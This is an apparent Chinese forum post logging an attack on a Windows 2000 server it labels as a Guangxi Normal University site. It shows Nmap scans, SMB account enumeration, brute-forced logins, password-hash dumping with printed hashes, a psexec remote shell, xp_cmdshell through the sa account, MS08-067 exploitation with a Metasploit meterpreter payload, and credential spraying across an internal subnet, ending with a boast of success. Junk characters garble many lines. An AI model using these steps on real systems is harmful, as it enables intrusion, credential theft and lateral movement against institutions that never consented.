广西师范网站http://202.103.242.241/' v) @0 C; E- x' z3 Z" }
9 }! {! X- S8 ?; r1 V4 H
root@bt:~# nmap -sS -sV 202.103.242.241
* q4 ?9 K2 z3 i% J# z8 ]6 ]
2 G2 j" Z/ a2 YStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
- F9 t3 Q. N A' [, R$ L5 u3 {: f: A( g$ {! t( ?# F( m0 M
Nmap scan report for bogon (202.103.242.241)
- t* a7 A3 `( t% x- s" T7 E1 \; d, x8 s1 R" `# H
Host is up (0.00048s latency).+ c( f/ C) C! h z, S& i" u
: A& E7 w Q) |/ Y. A6 P. {% _
Not shown: 993 closed ports
2 D: {" X' |( q$ j3 W- U" t( k6 m1 I( `
PORT STATE SERVICE VERSION
# {" \7 c- d3 @* h- R: n4 a) f6 w/ P6 H1 q: d
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
& }1 M* L! f& a+ H+ g: p3 B! \1 ?- o+ i; F; D9 }4 }
139/tcp open netbios-ssn
( u4 D, S8 P [, J# A( e- K6 J8 Q8 s. W" ]' q8 K0 E; D
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds, F: q/ ]) R; P' s2 @
# `) c9 c) F3 ~: W5 Y2 i% M, X. d
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
0 o# K6 x3 m! Q
1 \2 B* b* S1 M: x/ M5 X. s1026/tcp open msrpc Microsoft Windows RPC* ?& u0 ^; Y2 Y5 `0 z# a2 o
: i( s7 [: [9 V$ b3 X3372/tcp open msdtc?
+ K @, g0 Y' `5 J0 W' `+ a' Y5 o- _8 o% X. b
3389/tcp open ms-term-serv?
7 H" k: k) [" U) Z6 F2 T, r7 A1 J# j) Z9 g4 m& a$ l9 ~
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
9 A0 s( o1 \6 d8 H: x8 F ySF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
9 c% S! v o9 }0 H
! l5 }& G" x2 d: I( pSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions7 |0 \3 E( }7 @! T% t5 \
9 H8 r* z V, M3 I0 m
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)# ~% C$ K9 V8 U L' t$ Z [$ X* t+ c
3 }6 I( Q+ C- j3 a8 v
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
% n/ ?# N# W( t8 c3 G$ J1 n+ F: P% ^6 ^4 r1 E1 \2 _( C
SF:ptions,6,”hO\n\x000Z”);
x. y* X3 |) {, x1 X
2 K' S U2 t, L# U) h- b9 q1 _MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
; P. A9 V1 ?6 M* |/ y$ ~6 O, U5 Z& v/ ^, H+ ^
Service Info: OS: Windows
e/ u# W4 i5 b! S; ]" n+ e, P! l+ ]
# g! S! d! P/ K" z4 ?Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
+ ~; M" E- \/ x- u, q7 [( ]
& H) `4 f% Z: D2 G, q- s% E; jNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
; T. r/ Z& d! w9 @( |4 T6 w, a; T+ N: Q# R
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本( d) t8 k2 e3 u& B% ] e
! m) J% F2 Y, q& ]
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse/ a, e/ q9 s3 U
; N+ ~3 Y& z e
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
9 x3 a( q$ Y* y% i" Q- w# K
% O4 M8 E$ h$ {/ N- k-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
/ t$ \8 ^) K1 e* v1 }) s0 T8 `, E4 k- C$ {; E( H
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse' \( R" x) s+ J8 P* K; s
! Y" j* i( u; _. |-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
! b) x+ S- B' F+ N
' T" e" a' l" b* ~, n U-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse8 g/ j0 }4 C: i
! o! x2 Z) M% c& F" g( t
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
! A4 u% H, M2 _2 q0 K! g$ {# m2 M5 o( i% c. L* }
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse3 T9 D: O# H: q( A; H
1 m: f; n9 Q, }5 M% p9 L8 P# r' l-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse( K/ T4 ?6 Q8 |5 Y) N3 K
7 N2 I' a% g! N) p2 q
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
: Q3 a& @1 z2 t: s# W, w
2 B& o, F1 q9 T/ f& ?-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
2 j: _6 v4 b3 @4 o6 {7 \ Q# `) S4 K5 r9 |5 }1 ?+ ?2 E
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse$ o, D# p8 A4 V K8 t, O" A
, P' k, q" z3 o, z& G( i
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
- {6 F% N* \: ~( \
% Z- \$ C4 b/ x: Z8 T-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse+ P1 ?$ e. x9 n0 c: ]
W1 d l6 U# g
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
6 v; R, M T" a w2 B: C4 b4 S# b0 d# E; K, P% N' y j6 [
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 9 k% w3 X$ Q) A4 B$ `4 P u' @0 T
* U3 r9 B( ?& x; K- P
//此乃使用脚本扫描远程机器所存在的账户名
& u( {* u! p0 W( c# k Y% h- R% r5 c
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST; ?. I) ?! ^* [- y J7 x
4 v3 x# A; m3 h' oNmap scan report for bogon (202.103.242.241)6 o0 U" F" X# Q( u
& C' T4 R( U5 jHost is up (0.00038s latency)., L3 q% w: N5 s' `1 k! }" b
. h$ B" P1 M4 r8 h# v; S- [Not shown: 993 closed ports' s* C) l9 t* F/ @8 n& j
- @ f. g) m( |2 H: n5 ]
PORT STATE SERVICE
, ^- ?4 ]5 [& W# F9 `) K% o9 T U+ S# O/ n, y
135/tcp open msrpc
0 h* g2 \6 E" v' Q& c/ I
5 h; B- g* f3 U% P* l139/tcp open netbios-ssn
" N @# c6 i' p0 }4 L3 `1 U4 f) h+ _4 t' }
445/tcp open microsoft-ds
0 @ S; s# b) ?- V. y) i3 b9 X: N1 n. H5 Q1 i/ P2 t
1025/tcp open NFS-or-IIS* X+ u, e# O3 e8 V- }" w' d
6 a ]( D2 F7 F2 t( U1 q/ [
1026/tcp open LSA-or-nterm
3 y0 g7 ^: c" F) V1 \
# c; n8 T% K2 m+ b v: P3372/tcp open msdtc- R- Y" h7 _0 d
( ?7 y1 ^9 N% W, a) A: N# i. k
3389/tcp open ms-term-serv
( j% `- {) v- s' M4 g, f& r
& B( v; Y( _% s' o. ZMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems): Y: C- h _6 W' o& ?8 G
1 o" J8 @$ J+ p/ g P
Host script results:
* i% r P) Q% t( ~9 h4 S7 Y/ c- [4 e( S9 F9 \. J) d; a
| smb-enum-users:$ e2 b" o1 h" @2 P- a6 ]
: B4 }1 i0 Q& @2 \) E. T j
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
$ I0 ] x9 h, t0 U+ Q! j, C: d0 P6 P( l; p
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
) M9 j3 s; }0 v0 }
- R5 H H7 W, \2 T% G z* Vroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 % W' U3 V0 H, o4 D8 P9 C+ ^
$ ?8 V6 |8 f1 E3 F& J0 d( X: R3 C//查看共享
i& X" |9 u( _# _4 _, I& a
) o$ b% A- s. I7 T. A5 x$ rStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST8 a3 Z$ ^! k& }9 B, v4 j
; M9 H! P6 ]5 q1 c3 j) H6 RNmap scan report for bogon (202.103.242.241)
" `0 U2 H! Q2 V# Z# P) B7 h' v& ]
Host is up (0.00035s latency).
2 f& f% `% I3 O6 ^6 r3 y$ A; z" x' h, n7 [/ ]- z4 T, ?
Not shown: 993 closed ports; r: Q) I- ?6 S& r0 d8 }
' G4 P7 G e! ^$ EPORT STATE SERVICE |2 w6 H. W3 C. w
. O1 [3 T+ t" V+ b+ [135/tcp open msrpc
, H5 P5 a' \0 @! V, k# O. ]5 P2 _1 d% o1 d( [. K
139/tcp open netbios-ssn
: O( z: S1 q8 W" O& ?8 j& K2 v u# X; d! j! r, D7 g/ _7 n
445/tcp open microsoft-ds
8 B* p5 P1 A! H: G, I6 l; L. B9 q0 Z: [+ e# A- s0 O
1025/tcp open NFS-or-IIS
$ R+ Y( F$ z' v8 y* V! \. }/ t' D% n
1026/tcp open LSA-or-nterm
. X& t* s; z# {1 t1 ^
: |1 ?8 E- n! w6 _: M3372/tcp open msdtc4 e" U; C; e& g$ q1 Z
8 D# K/ g, x# K( Y5 w) m7 y7 e
3389/tcp open ms-term-serv
( H! B. @$ Q8 ]5 i, I1 S: v; O/ }' @; z$ a, C$ F! K) n4 D: A$ X
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)$ C+ Y V$ S7 o+ L
" b3 n4 j0 p* S3 T5 MHost script results: `' T# Q+ ~' i
& ~/ O; I6 D5 l6 i
| smb-enum-shares:
# e G/ v; I0 ^$ t: H0 f D5 @' r% H3 C( M3 y$ g5 `
| ADMIN$0 W A# Q: n3 J8 C) O) Z( Y5 I
" N! Y# s2 ^6 B9 _: M| Anonymous access: <none>. [& {. t9 e M' L! L5 T' s1 N
+ g- g- o* u7 |9 `. ^$ v| C$
7 {: J% ~& C8 j- z# q1 ]6 h, z& {4 ^- c8 `
| Anonymous access: <none>
* h" d$ y! m( B) x1 z; w# ?- R
0 ~2 D m+ Y# y, W8 t* u7 D| IPC$$ e5 K' t0 w$ w, g: H4 a
) ^5 I/ k! m' E) B
|_ Anonymous access: READ
7 J M; y+ R3 y# E( } {0 s4 U9 j0 P. |1 a3 t
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds s/ x; e2 ?; ]8 h
8 A7 |4 U- b- kroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 0 s5 G+ M6 X/ J5 o
3 a7 M6 A$ q2 ]) m* k0 {//获取用户密码
, v9 r$ W6 Z" }, |5 d( X
9 t s9 K$ c1 Y% Z8 I, VStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST: a: m5 n Z/ z* C4 H1 K& T
, `6 H+ ^: O; ~. t& MNmap scan report for bogon (202.103.242.2418)
* S" U" ]3 J1 f9 e! i8 S+ G
* I E$ G6 p$ q0 @$ R @/ eHost is up (0.00041s latency). D+ T: [8 \7 w7 I7 u
, V6 u/ m; o5 [0 V. M) D
Not shown: 993 closed ports5 v" {1 N$ V: K6 x
! m* C1 c0 l. E. X
PORT STATE SERVICE
8 }3 ]6 J6 S$ i( W1 Y) {$ n! ]" P
3 V0 @3 x( F0 B0 |6 C: r/ i135/tcp open msrpc
6 ?. G" p8 W# Q' b+ b: @1 R. o8 K& @9 P) U. ?
139/tcp open netbios-ssn
6 A8 ]4 n4 u) [
( C( I+ J5 U6 p445/tcp open microsoft-ds
! c2 y+ C! E s: h5 T
% |. H A" Y# z0 V2 Q/ Z' a1025/tcp open NFS-or-IIS
5 q, h; F! p$ Y2 M4 E6 A0 f, z% q; d3 f3 d
1026/tcp open LSA-or-nterm
9 L- u# g- |9 N) X3 z% k5 b
& A& w5 O9 O0 \" z3372/tcp open msdtc5 G! o e" D- H6 K
( Z6 j6 ~. i7 G3 d0 I5 w
3389/tcp open ms-term-serv$ `) {7 j& C: D9 ~* {
/ @. }! e$ y" p: `. d$ H$ c8 pMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)+ n! g6 A) r) z) i
6 }. J/ @3 r( l, oHost script results:
. X4 ~4 Z0 f' \+ G6 j' V' e" G3 Q* H7 _
| smb-brute:
7 f. v- D: O0 j* i: q: _
1 K+ c9 `1 e2 j+ ]4 C/ Cadministrator:<blank> => Login was successful
6 }* g; |6 w( @8 f7 N* Q
, j; g" {6 V! ^) N! e6 K" C|_ test:123456 => Login was successful) w& j6 U( \. x K0 ~7 _" Y
% @' I# A* |# l% {& Q) m
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
5 U& Y% y9 ~$ p: L. j$ o0 d7 w0 Z' U& l
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash8 @, N+ x# R( y1 d
0 ]6 y& r R. P1 O4 Y
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
( m/ _$ C4 r0 n2 W, J8 [- i, c# Q4 O/ X" t% l/ G+ z* M7 Q
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse7 x: E# C. N0 a% l7 X9 w0 P4 n
% q: s8 S' _* D7 k, }root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1397 L2 q1 {- H! d
7 C$ A5 V: L; [' t- T6 U( G' r: S/ sStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST- P2 y- g. e* N) k/ \% m8 n7 ]
, G" A! K- I# g/ I' a
Nmap scan report for bogon (202.103.242.241)
0 T7 m- J. f. Q! Z1 v" a; f! `9 R, E0 g9 V [0 Y' S5 C9 m9 n
Host is up (0.0012s latency).
& D' a8 X4 E5 _6 u" L) |7 X% Z7 I2 C/ s/ B' Y o- z
PORT STATE SERVICE/ e( k4 G, ~4 I( j9 G; L
+ r8 J/ |2 U; n1 a4 o135/tcp open msrpc
( I: E2 a* t+ r4 O" J: y6 ]4 y1 y4 z; t; D
139/tcp open netbios-ssn# ?, s- {# X( H( t/ r
1 o. p, S* T; f! N9 m7 a
445/tcp open microsoft-ds
4 m) P ~. _$ e/ P
* d$ J5 S9 x f: w0 \! Q B+ AMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
E; j! l5 B& S) T. \3 q8 ?. v4 j
6 d7 K/ G2 p( }( FHost script results:
& _9 o5 e1 g f( P9 t2 }7 I
; T1 p( e$ f( A( [! {| smb-pwdump:
# X; Q. J6 X* O$ `8 U
9 R4 g' b* e: P| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************$ [: | t& U: U f& L, {2 G3 Y
6 f# t9 R1 n' c. X$ j| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
; D3 n) @+ k6 k! e( W1 k" U' D& H5 d, u4 k" V1 U/ X8 d+ z
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
) v! [) W% Q* P5 Q" f @7 p( K0 Z1 y
1 C/ j+ @9 I% b6 w* h) C7 D8 u|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
* S2 {: t. C; X0 u: ~; x! D. i% r9 W5 e
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds' N3 q3 B6 h3 L. f4 s
7 u) F1 C! e; \" W, f$ [
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
5 K) X- h2 ~4 k5 M
" g" J5 J9 ], f9 ?: h+ {' [-p 123456 -e cmd.exe
& V7 n/ w( N: C f4 a
6 H- a O, h+ o2 f6 IPsExec v1.55 – Execute processes remotely
4 _2 U3 ^6 `/ Q) X3 G- H, m
8 t0 q d- _) _! WCopyright (C) 2001-2004 Mark Russinovich
! Y, a4 |9 o2 q1 q f! J) K9 I. `8 @- `0 s: Y |
Sysinternals – www.sysinternals.com
* d" y+ H! B f; j8 ]: Q
. I" p6 v, u) YMicrosoft Windows 2000 [Version 5.00.2195]9 {! h6 ?7 Y& L) c8 m) M
& |" C& _" u& @4 f(C) 版权所有 1985-2000 Microsoft Corp.7 ^$ S8 u) B: F: c
0 g6 V% L( E& ?0 x+ T9 [* ^C:\WINNT\system32>ipconfig2 S3 f8 D9 v5 b3 v4 S0 p9 V
( T0 J* L$ Z- mWindows 2000 IP Configuration
- i8 s2 |& v5 q/ m& q. {
3 Z( W+ c5 o, `. @8 Y; _3 lEthernet adapter 本地连接:
+ K$ S) V) ?! q9 g7 ?5 W
( y+ Q( {( N# l9 j! ]: uConnection-specific DNS Suffix . :
- j; Z, K" f1 e' d6 p9 C1 i# m1 o! a$ f7 E$ l
IP Address. . . . . . . . . . . . : 202.103.242.241
4 e! t: x: E9 T, S3 ^# N) ]+ N* C! |/ I
Subnet Mask . . . . . . . . . . . : 255.255.255.07 A2 S+ g4 E+ ~- G1 x* U, f6 a
4 }' x v& p( g" J# W5 R) tDefault Gateway . . . . . . . . . : 202.103.1.1
* j3 t; n* s; d- N4 `8 R; T; a% h5 [3 \5 D/ L" d9 j
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
+ v. B3 V& J+ M) v. L# i5 ~
7 R/ v i" `( ~0 `& croot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
: ^. M( c1 Q1 ]( ~' c8 j9 w6 @- j$ V+ d1 h E9 v! n
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST3 _7 D& p- A. z. J. }! h6 S
8 o& ]' P9 R, D6 e$ w
Nmap scan report for bogon (202.103.242.241)
! @ ]$ ^2 J; L$ l4 V6 K8 ^. u5 E4 }$ g8 ]( e& V5 C' x
Host is up (0.00046s latency).: s. z' s; f8 A! V3 X
! W$ B7 ^) `' ~& y
Not shown: 993 closed ports5 n p1 ~ u2 H0 l+ Z* W
; K) b, `* l8 W( V. N
PORT STATE SERVICE* q) m2 Y) [) j( g0 W# _
: @9 d% o0 Z. \) T. \- N$ H/ R135/tcp open msrpc, o8 y: W+ v0 }, Q+ \, g! X2 X' o. G
% g7 y, Y7 R! A* u# \! t; s2 X; u139/tcp open netbios-ssn; I6 B/ x- M# [. P8 l8 b
. e/ t5 u# {) n. h0 E
445/tcp open microsoft-ds* F' O: N9 P: q4 O2 [4 ` W% G
( n7 t# c6 N+ N( I4 a
1025/tcp open NFS-or-IIS/ L9 l! X! {( |
* f# A2 P& T" W) }( o4 B# w2 {
1026/tcp open LSA-or-nterm
, `+ @' L1 w* O1 [
* z' x9 W/ t- I8 A b9 J3372/tcp open msdtc
; F8 `8 _# S) N" F5 ?2 b6 {: l, M+ l: p+ d
3389/tcp open ms-term-serv
6 Z8 i1 S- U- _% C( f1 x; X/ x
' s# Z" c" \% \! s! j0 ?MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems); c, B5 A( q- U0 [; W9 |
, n- p/ b o# Y& z
Host script results:' I$ u) ]/ j; U* [8 N
7 R- u- o# j4 a1 B; A* w
| smb-check-vulns:
) `' v( [7 `0 {- b3 ^9 J o) E b0 u4 X; @4 V" g/ o" |. R# `
|_ MS08-067: VULNERABLE
' K% O9 B8 Z& C. W$ J) z, P. ?
, r8 v! G0 ~, n% {/ m5 @- YNmap done: 1 IP address (1 host up) scanned in 1.43 seconds
: M8 g8 g' Q( _, }' v0 v4 @
3 b9 H$ C; Y4 i# droot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
1 H% h! ^) { g, T$ ^! y1 q
& r _7 _4 \" A* t4 B( T: A2 ?msf > search ms08
% C/ }6 W0 ]9 n8 e0 p* `& O4 E& s. n) I4 h& l r- q
msf > use exploit/windows/smb/ms08_067_netapi$ p6 ]: k* x7 q" F; X2 d
4 r3 |" o. g; A, m _; v
msf exploit(ms08_067_netapi) > show options
/ @! D) T4 q6 n$ G$ R6 U( r1 h6 K, M0 Z; H* F& @0 J
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241& X( _9 j3 ]5 c4 m' h# I
5 g/ c3 e N: N' ^# D5 Lmsf exploit(ms08_067_netapi) > show payloads. r9 I4 t8 M4 a% o
, c" a/ N+ {9 \: I. z1 d5 K, L
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
. K# |* N2 ?2 d0 P' B
( B7 j, o! j1 N G, e( xmsf exploit(ms08_067_netapi) > exploit
- ? P" G9 `* Y# h" F+ j6 J7 O# g( t* [ q7 H' ~
meterpreter >& V& s$ [. C. s4 n4 l
" d3 O! V. L( j! B, xBackground session 2? [y/N] (ctrl+z)" W2 Y# U/ ]1 P, q0 \, E
9 @$ y( Z/ H7 |% pmsf exploit(ms08_067_netapi) > sessions -l) v, U% y- ~+ ~
8 o6 p5 D- b/ ^2 n. _) N. \5 ?
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
3 @5 p! ]- l& R/ y" K. C' h: H+ d# D* n( `& Z0 @. n) c" N9 m6 W
test
: s6 J9 q* c9 v/ a' N& t# l9 x4 A+ C2 ?. }: g
administrator6 o) F1 o" {2 s4 j
5 d( C# R2 R, O' Z2 X5 ?! ~. K
root@bt:/usr/local/share/nmap/scripts# vim password.txt# p7 @# z9 l; u* d
- U- c8 f0 v6 w4 Q- H3 _: }
44EFCE164AB921CAAAD3B435B51404EE9 D+ C. \2 k/ [5 T7 M8 H9 n
4 T; Z) W! t! V2 M- A
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 ! W% w9 w5 f) U6 J) I' g
7 o) @( R" @3 q+ C$ X+ {' [ //利用用户名跟获取的hash尝试对整段内网进行登录
; K) F, i5 v& K+ {+ C0 Y, O
3 \ n2 [/ b- z0 x- RNmap scan report for 192.168.1.1058 w1 O- |; Y. L' ~& I( x
3 ?4 J9 t+ \; v+ w8 O. |
Host is up (0.00088s latency).: N+ E; t3 F. Q! a! b5 r' B0 n
# H; h/ y. w* l9 X8 K2 V6 G
Not shown: 993 closed ports
+ {% r( `0 U6 N
1 v' Y+ y0 Z/ B; b. l4 `PORT STATE SERVICE
! J I6 R0 C+ }2 K' r/ A/ `: C; b6 \) N
135/tcp open msrpc
' F1 e3 v4 h" ~! H' r+ p! D, x1 G5 S3 d+ ~3 x' Q# F2 [
139/tcp open netbios-ssn
3 u- G* N3 `3 `! M* `0 O x( [: R
445/tcp open microsoft-ds
; k" F5 X5 a2 ~) `! H0 `
. o1 s& m5 H. a5 Q+ V, S/ F1025/tcp open NFS-or-IIS
4 A1 g' `2 U' z& [9 `- K& p9 u$ ]7 z) d+ e9 r( N
1026/tcp open LSA-or-nterm! o0 o0 r& S. N7 A5 H8 ~2 }
: S# |# I! m7 L" N; n4 x
3372/tcp open msdtc/ l8 ?2 o7 Z+ y7 ~% E0 i
) s1 a' Y+ J9 t9 @ x* _) Z
3389/tcp open ms-term-serv
% N% b$ h, C8 M: q% d M# K& [/ o/ N! V* I* Z- X# z9 w/ O* s
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
! E6 l6 T& ]. r2 f( b
& X3 i' }- U1 A4 `9 I pHost script results:, W, _: T) O0 ~% P( i
0 Z: T3 z/ I+ I+ W3 B- }
| smb-brute:" t) \3 G, U* Y; N- _& ~
* } F. x% m4 g
|_ administrator:<blank> => Login was successful, P9 b0 Z! N4 O" J" d; O( D6 k0 f
6 S: }! B5 m) }
攻击成功,一个简单的msf+nmap攻击~~·
: ~5 m/ g. m) h# ~3 `" c
) [2 T! b: K- r: R |
发表于 2012-12-4 12:46:42
收藏
支持
反对